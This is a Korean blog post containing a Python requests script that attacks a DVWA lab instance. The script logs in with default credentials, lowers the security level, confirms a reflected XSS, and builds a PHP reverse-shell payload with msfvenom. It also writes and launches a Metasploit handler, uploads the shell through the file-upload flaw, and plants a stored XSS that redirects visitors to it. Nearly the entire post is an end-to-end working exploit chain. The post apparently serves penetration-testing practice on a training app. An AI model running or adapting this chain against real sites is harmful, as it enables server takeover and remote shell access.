Self-Improvement

requests으로 DVWA Low XSS 본문

프로그래밍/Python

requests으로 DVWA Low XSS

JoGeun 2018. 10. 21. 13:15
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#login 
import os 
import re 
import sys 
import time 
 
import requests 
from bs4 import BeautifulSoup 
 
login_url = 'http://192.168.10.134/dvwa/login.php' 
login_data = {'username':'admin', 'password':'password', 'Login':'Login'} 
proxies = {'http':'http://localhost:9000', 'https':'http://localhost:9000'} 
s = requests.session() 
req = requests.Request('POST', login_url, data=login_data) 
prepared = s.prepare_request(req) 
resp = s.send(prepared, proxies = proxies) 
 
soup = BeautifulSoup(resp.text,'lxml') 
MESS1='Welcome to Damn Vulnerable Web App!' 
if re.search(MESS1, str(soup.h1.string)): 
    print('[ ok ] login') 
else: 
    print("[ fail ] login") 
    sys.exit(2) 
 
#low level setting 
security_url='http://192.168.10.134/dvwa/security.php' 
security_data={'security':'low','seclev_submit':'Submit'} 
resp=s.post(security_url,data=security_data, proxies=proxies) 
soup=BeautifulSoup(resp.text,'lxml') 
if re.search('low', str(soup.em.string)): 
    print('[ ok ] low setting') 
else: 
    print('[ fail] low not setting') 
    sys.exit(3) 
 
login_url='http://192.168.10.134/dvwa/vulnerabilities/xss_r/?' 
login_data={'name':'<script>alert("hacked")</script>'} 
resp=s.get(login_url, params=login_data,proxies=proxies) 
soup=BeautifulSoup(resp.text,'lxml') 
if re.search("hacked", str(soup.pre.script.string)): 
    print("[ ok ] xss") 
else: 
    print("[ fail ] xss") 
 
#msfvenom -p php/reverse_php LHOST=192.168.10.60 LPORT=4444 -f raw > attack.php 
print("[ info ] please wait a few minute.") 
os.system("msfvenom -p php/reverse_php LHOST=192.168.10.60 LPORT=4444 -f raw > attack.php ") 
print("[ ok ] attack.php created") 
 
resource=""" 
use exploit/multi/handler 
set payload php/reverse_php 
set LHOST 192.168.10.60 
set RPORT 4444 
set ExitSession false 
exploit -j -z 
""" 
 
fd =open('reverse_connection.rc','w+') 
fd.write(resource) 
fd.close() 
 
print("[ ok ] reverse_connection.rc file created") 
 
 
#msfconsole -r cmd 
os.system("xterm -e msfconsole -r reverse_connection.rc &") 
print("[ info ] please wait a few minute.") 
time.sleep(20) 
print("[ ok ] msfconsole -r <cmd>") 
 
upload_url='http://192.168.10.134/dvwa/vulnerabilities/upload/' 
upload_files={'uploaded':('attack.php',open('attack.php','rb'),'text/plain')} 
upload_data={'MAX_FILE_SIZE':'100000','Upload':'Upload'} 
s.post(upload_url,files=upload_files,data=upload_data,proxies=proxies) 
print("[ o k ] attack.php") 
 
#<script>window.location="http://192.168.10.134/dvwa/hackable/uploads/attack.php"</script> 
xss_url='http://192.168.10.134/dvwa/vulnerabilities/xss_s/' 
xss_script='<script>window.location="http://192.168.10.134/dvwa/hackable/uploads/attack.php"</script>' 
xss_data={'txtName':'test1','mtxMessage':xss_script,'btnSign':'Sign+Guestbook'} 
resp=s.post(xss_url, data=xss_data,proxies=proxies)
cs